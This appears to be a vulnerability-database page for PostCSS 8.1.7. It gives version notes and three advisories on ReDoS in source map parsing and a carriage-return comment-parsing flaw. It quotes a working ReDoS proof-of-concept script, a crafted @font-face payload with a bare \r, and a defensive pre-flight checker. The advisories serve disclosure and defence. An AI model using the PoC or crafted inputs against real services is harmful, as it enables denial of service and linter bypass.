PostCSS version 8.1.7 is a minor update to the popular CSS transformation tool, succeeding version 8.1.6. Both versions, designed for developers, offer a powerful and extensible platform for manipulating CSS using JavaScript plugins. Key features like automatically adding vendor prefixes, linting, and future CSS syntax support remain consistent across both releases. Core dependencies, including nanoid, colorette, source-map, and line-column, are unchanged, ensuring a consistent development experience. The MIT license continues to provide developers with the freedom to use and modify the library.
The primary difference between 8.1.6 and 8.1.7 lies in internal improvements and bug fixes. The core functionality is identical and there are no breaking changes; the unpacked size grows slightly, from 197,211 bytes to 197,769 bytes, which is consistent with refined code or added assets. Developers upgrading from 8.1.6 to 8.1.7 can expect the same API and plugin compatibility. The later release date, November 10, 2020 versus November 5, 2020, indicates that version 8.1.7 addresses issues identified shortly after the 8.1.6 release. Upgrading to 8.1.7 is therefore recommended for developers seeking the most stable and up-to-date experience.
All the vulnerabilities related to version 8.1.7 of the package
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
// PoC from the advisory: each timed iteration appends one more unterminated
// sourceMappingURL annotation and measures how long postcss.parse() takes on it.
var postcss = require("postcss")

function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output in CSS nodes (rules, properties) despite originally being inside a comment.
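As an added example (not part of this page or of PostCSS itself), a pre-flight check a linter could run before handing untrusted CSS to PostCSS: it matches the installed version against the three affected ranges quoted above and flags the two input shapes the advisories describe (repeated or unterminated sourceMappingURL annotations, and a bare \r line ending). Each range is read as a half-open interval with the fixed version excluded, and the version comparison ignores prerelease tags; both are simplifying assumptions, and the sample inputs are constructed to mirror the PoC and the @font-face rule quoted above.

```javascript
// Added example, not PostCSS code: pre-flight checks for a linter that parses
// untrusted CSS with PostCSS. Ranges are copied from the advisories above and
// treated as [lo, hi) with the fixed version excluded (assumption).
const ADVISORIES = [
  { id: 'ReDoS in source map parsing',
    ranges: [['7.0.0', '7.0.36'], ['8.0.0', '8.2.10']] },
  { id: 'ReDoS in getAnnotationURL()/loadAnnotation()',
    ranges: [['0.0.0', '7.0.36'], ['8.0.0', '8.2.13']] },
  { id: 'line return (\\r) parsing error',
    ranges: [['0.0.0', '8.4.31']] },
];

// Numeric dotted-version compare; prerelease tags are ignored (simplification).
function cmpVersion(a, b) {
  const pa = a.split('.').map(Number), pb = b.split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const x = pa[i] || 0, y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Ids of the advisories whose ranges contain the installed version.
function affectedAdvisories(version) {
  return ADVISORIES
    .filter(a => a.ranges.some(([lo, hi]) =>
      cmpVersion(version, lo) >= 0 && cmpVersion(version, hi) < 0))
    .map(a => a.id);
}

// Flag the input shapes the advisories describe before the CSS reaches PostCSS.
function auditCss(css) {
  const findings = [];
  // The PoC above repeats the annotation comment n times and never closes it;
  // a real stylesheet carries at most one, closed with */.
  const annotations = css.split('sourceMappingURL=').length - 1;
  if (annotations > 1) findings.push(`${annotations} sourceMappingURL annotations`);
  const last = css.lastIndexOf('/*# sourceMappingURL=');
  if (last !== -1 && css.indexOf('*/', last) === -1) {
    findings.push('unterminated sourceMappingURL comment');
  }
  // A carriage return not followed by \n is the \r the third advisory describes.
  if (/\r(?!\n)/.test(css)) findings.push('bare \\r line ending');
  return findings;
}

// Constructed samples: the shape built by build_attack(3) above, and the
// @font-face rule quoted in the third advisory.
const POC_INPUT = 'a{}' + '/*# sourceMappingURL='.repeat(3) + '!';
const CR_INPUT = '@font-face{ font:(\r/*);}';
console.log(affectedAdvisories('8.1.7'), auditCss(POC_INPUT), auditCss(CR_INPUT));
```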